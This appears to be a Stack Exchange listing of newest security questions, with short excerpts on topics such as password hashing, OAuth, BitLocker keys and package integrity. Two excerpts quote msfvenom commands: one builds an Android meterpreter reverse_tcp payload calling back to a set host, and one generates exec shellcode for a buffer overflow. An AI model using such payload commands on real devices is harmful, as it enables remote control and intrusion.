Newest Questions
70,166 questions
0
votes
0
answers
4
views
hypothetical copy/paste code exploit from stackexchange or llm code copy blocks
is it possible to insert hidden code using utf8 that rearranges a sequence of executable ascii letters (first utf8 character that rearranges the letters off-screen could be interpreted as an ignorable ...
0
votes
0
answers
21
views
How to properly assume an AWS IAM Role in an automated way from server sitting outside of cloud?
To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
1
vote
0
answers
24
views
Android msfvenom payload [closed]
I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
0
votes
1
answer
43
views
MsfVenom generated shellcode fails when using it in buffer overflow
I use msfvenom generated shellcode in buffer overflow.
Here's command that i used to create shellcode for linux x64:
msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami
and here's ...
0
votes
1
answer
36
views
How to find out if CSP report is XSS vulnerability or malicious browser extension?
I have recently added CSP headers to a rather complex web application, being -report-only at first.
I got some noise from browser extensions in the report, but two incidents caught my eye especially:
...
1
vote
0
answers
30
views
Can a SIM card have malware and how can it spread? [duplicate]
I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also?
I saw that it can attack during a phone update download. If the update has downloaded ...
1
vote
0
answers
65
views
GPU speedup for PBKDF2 vs bcrypt vs Argon2
I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
1
vote
0
answers
76
views
VPN client on a router versus VPN client on a computer
Until now, I have been using VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
0
votes
0
answers
56
views
Wikipedia certificate unexpectedly from Google [closed]
Wikipedia's CAs are Let's Encrypt, DigiCert and GlobalSign. But my browser shows a certificate issued by... Google? (See the screenshot) What can this possibly mean?
I know there are some similar ...
0
votes
0
answers
13
views
What is this path added by /etc/paths.d/10-pmk-global on macOS? [migrated]
I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global.
Usually, a system-related program would go in /...
0
votes
0
answers
24
views
How secure is the package lm-sensors? [closed]
I want to know how much secure is the package lm-sensors.
I need to monitor the temperature of my machine to adapt the configuration of the fans.
The programm prompt me for my root password to access ...
0
votes
0
answers
22
views
Seeking Advice on Transitioning to a Cybersecurity Career after 3 Years as a Full-Stack Developer [closed]
i wanna your advice for
cyberSecurity career i've been 3 years experience as fullstack developer
and i thing i gave some love to all things realated with DevOps and linux an cyberSecurity , so i ...
0
votes
0
answers
21
views
Insights required on my naive aproach to audit Firefox extensions [closed]
I tried to search the web on existing projects, but after failed attempts, I decided to code something on my own way, one approach, open to comments and improvements:
#!/usr/bin/env python3
import ...
0
votes
0
answers
32
views
Possible web form injection from ad triggering biometric prompt
This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
0
votes
1
answer
87
views
Is C#'s System.Web.Helpers.Crypto password-hashing still considered secure?
I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...
0
votes
0
answers
18
views
Late 2025/2026 equivalent of ExtAnalysis to audit Firefox extensions? [closed]
I discovered ExtAnalysis, tried to run it in a Docker container, but this seems that this project is abandoned.
There's too many errors. Some issues are opened since 2023 in the repository.
So my ...
-1
votes
0
answers
47
views
Why do money transactions stop during the change of clock due to daylight saving time? [closed]
During the change of clock due to the daylight saving time, almost all banks stop all money transactions at least from 1 hour before to 1 hour ahead of the time of change if the clock. Why do they ...
0
votes
0
answers
18
views
using ffuf with wordfile but it is not finding .env [closed]
I am doing a security exercise where I need to use a wordfile and scan a server for endpoints to find a secret.
The secret is on a file called .env (I found it in a different way), but I wonder why ...
0
votes
1
answer
188
views
File backup encryption for personal files
I would like to be able to store backups on potentially "untrustworthy" sources such as cloud storage. Whilst I could probably get away with a simple encrypted tar file, for a single backup, ...
5
votes
1
answer
809
views
Can you bypass PIN requirement of FIDO token protected LUKS device with hex editor?
I noticed that with Linux pam-u2f module whether you are required to input your PIN can be changed by simply editing ~/.config/Yubico/u2f_keys file and either adding +pin to your configuration line or ...
6
votes
1
answer
609
views
What is the difference between contactless Apple Pay and contactless card?
Apple claims that one time token is created. What is the purpose of that token? What happens with that token?
As far as I know when I pay with my physical debit card the information passed the POS ...
0
votes
1
answer
40
views
PCI applicability when only typing cc info into a client's payment system
My company has a small call center. Less than 100 people. Currently we do not do any credit card transactions but are looking to do so in the future.
One potential client has us using their ...
7
votes
3
answers
2k
views
Does an SMS OTP have to be recreated for every message?
I use SMS for MFA (yes I know it's bad, but better than no MFA) in an web application.
On login an OTP is sent to the user via SMS.
This OTP is valid until:
it expires after 10 minutes
it is ...
0
votes
0
answers
21
views
Why is the raw log data parsed by Defender different from what is shown in the Defender console?
How does Defender for Cloud interpret and normalize these logs?
In the Defender console, I see an inbound connection on a DMZ host (acting as an FTP server using vShell), showing Tor IP → internal IP.
...
0
votes
1
answer
62
views
Does qualified electronic signature require a certified middleware
When you interact with QSCD on a token do you need the middleware to be issued by a Trusted Service Provider (TSP), or is middleware just a utility which I can reimplement on another platform?
Does ...
1
vote
0
answers
46
views
How can I restrict IFEO vulnerability?
I have an application, myapplication.exe. Through IFEO registry I can attach a debugger, which can be a malicious piece of software for a attacker.
Only someone having access to Windows registry can ...
0
votes
0
answers
55
views
What is the appropriate incident-response procedure after a user clicks a phishing link without entering credentials? [duplicate]
A user accidentally clicked a link in a phishing email.
The link led to what appeared to be an online video-course/tutorial site. The user did not enter any credentials, download any files, or ...
0
votes
1
answer
96
views
How I can ensure that I have enough entropy in a base64 encoded byte string?
In php I am generating a unique random token used as a code and Index for password resets:
declare(strict_types=1);
namespace App\Domain\Helper;
use Ramsey\Uuid\Uuid;
use Random\RandomException;
...
0
votes
0
answers
4
views
How to analyse Android mobile memory? [migrated]
Is there any method to forensically analyse Android mobile memory without rooting the phone. I want to capture malware in my Android phone.
0
votes
3
answers
98
views
Generating OTP used in SMS and email
I am using the following approach for time limited OTP used in my php app using a pseudorandom generator:
$otp=str_pad((string)random_int(0, 9999), 4, '0', STR_PAD_LEFT);
Then upon the User I store:...
0
votes
0
answers
39
views
Does chocolatey provide cryptographic authentication and integrity validation?
Does the chocolatey package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them?
I usually trust my OS ...
0
votes
1
answer
30
views
Does cygwin provide cryptographic authentication and integrity validation?
Does the cygwin package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them?
Fortunately, it's possible to ...
3
votes
7
answers
3k
views
How to Protect Commercial Java Software Running on Client Machines?
I am making my first commercial Java program and am worried about crack prevention. I would run it on the cloud, except it needs to run on their machine at a runtime. I have an obfuscator set up, but ...
0
votes
0
answers
49
views
What is commonly done in embedded/IoT systems to encrypt flash storage? Is TPM, PUFs, eFUSEs, TEE used to get the decryption key?
Assuming that RAM is inside the SoC, nullifying the possibility of cold-boot attacks, the only other way to obtain the decryption key is to extract it from the secure storage in which it is saved.
I ...
0
votes
0
answers
36
views
Tokenized PAN & PCI DSS Compliance
I have been asked to implement a new payment system that uses Google/Apple Pay's Direct integration (using Tokenized PANs (DPAN), not clear cards) as well as a similar Tokenized PAN retrieved from our ...
0
votes
2
answers
171
views
How do embedded systems protect encryption keys when no user authentication is possible at startup?
Embedded and IoT systems power on autonomously, without user input (unlike PCs or phones requiring a PIN/password). If the manufacturer wants to encrypt the flash storage:
Must the decryption key be ...
2
votes
1
answer
168
views
Why does BitLocker keep the Volume Master Key (VMK) in plaintext RAM instead of inside a TEE?
I have two related questions about BitLocker’s key handling:
1)
After the system boots and BitLocker unlocks the drive, TPM releases the Volume Master Key (VMK) and from now on it is resident in ...
0
votes
1
answer
63
views
How can CSRF occur in OAuth2 using the Authorisation Code flow if not using the state parameter?
I'm trying to understand the Authorisation Code flow in OAuth and I'm confused about how CSRF would happen, specifically I don't think I'm understand how the flow actually works.
Here's a diagram of ...
0
votes
1
answer
57
views
Should refresh tokens be returned in Authorization Code flow? If not, how can a user stay logged in?
I'm implementing OAuth2 authorization code flow with PKCE for a public client (SPA) using Spring Authorization Server, and I've noticed that no refresh token is included by default in the token ...
1
vote
1
answer
65
views
How to safely determine if an IDN (International Domain Name) simply redirects to the non-IDN equivalent domain name or is an imposter site?
In this old InfoSec SE question regarding IDNs (International Domain Names), the OP asks if companies should "actively seek out and register domains in alternative (similar looking) character ...
0
votes
1
answer
46
views
Encapsulate and secure service that has access to sensitive data
I have an API Key for a service that holds sensitive data (Sick Days, Employee Home Address) that should not be exposed to other devs in my company.
The API of my service will only allow a user with a ...
0
votes
0
answers
74
views
Not quite end-to-end encryption: encryption models where backend needs to do processing outside of a user session
I'm struggling to come up with a better encryption model for this scenario:
User is mobile app user
Small (USA) company with small budget wants to store data encrypted at rest per user in cloud ...
0
votes
0
answers
157
views
In Windows 11 why a simple 32-bit console binary run from shell goes without problems while patching just a byte, triggers UAC/new-shell for it?
I came to ask this doubt here, because, it ended being more an operating system's security heuristics/cryptological question than a pure reverse-engineering one.
Question is about UAC and its ...
0
votes
1
answer
194
views
Lots of copies of avg_secure_browser_setup.exe in my Downloads folder downloaded automatically
I have about ten copies of:
avg_secure_browser_setup1.exe
avg_secure_browser_setup2.exe
avg_secure_browser_setup3.exe
etc.
This isn't the first time that I've found this. The first time I noticed ...
0
votes
0
answers
6
views
Can you use Eraser to securely shread a file or folder [migrated]
After a fresh install of Windows 11 on a wiped disk, can you hide your Recycle Bin and never use "Delete", but instead right-click the file or folder and use Eraser software to permanently ...
1
vote
1
answer
86
views
Veracrypt disk encryption
If I wipe a SSD twice with Killdisk, then do a clean install of Windows 11, then do full disk encryption with Veracrypt, then clone this disk to several wiped external SSDs, can I use the same ...
1
vote
1
answer
69
views
PuTTY gpg master key (2023) not validated by 3rd parties
PuTTY's latest master key (https://www.chiark.greenend.org.uk/~sgtatham/putty/keys.html) does not seem validated / signed by external 3rd parties.
Is this a red flag? See https://pgp.mit.edu/pks/...
0
votes
0
answers
74
views
What's the security risk, if any, if I allow a site to access my device's identity?
I sometimes see on Opera on Android:
Allow protected content
https://www.politico.com/ wants to play protected content. Your device's identity may be accessed by this site.
☑ Remember choice
Deny ...
1
vote
0
answers
47
views
Tiered AD model: How to grant temporary admin on a workstation without violating Tier-0 hygiene?
My apologies if I ask a basic question,
My Question: So when we design AD environments, we create Tiering models, for example, let's say Tier-0 ( Domain admins ), Tier-1 ( Workstation users )
So now, ...
0
votes
1
answer
53
views
M2M communication from a trusted app with an untrusted user
This is the scenario I'm facing:
Windows 10 LTS / Windows 11 clients
user with autologon and "unknown" password (the password is autorotated and stored somewhere)
user has limited rights (...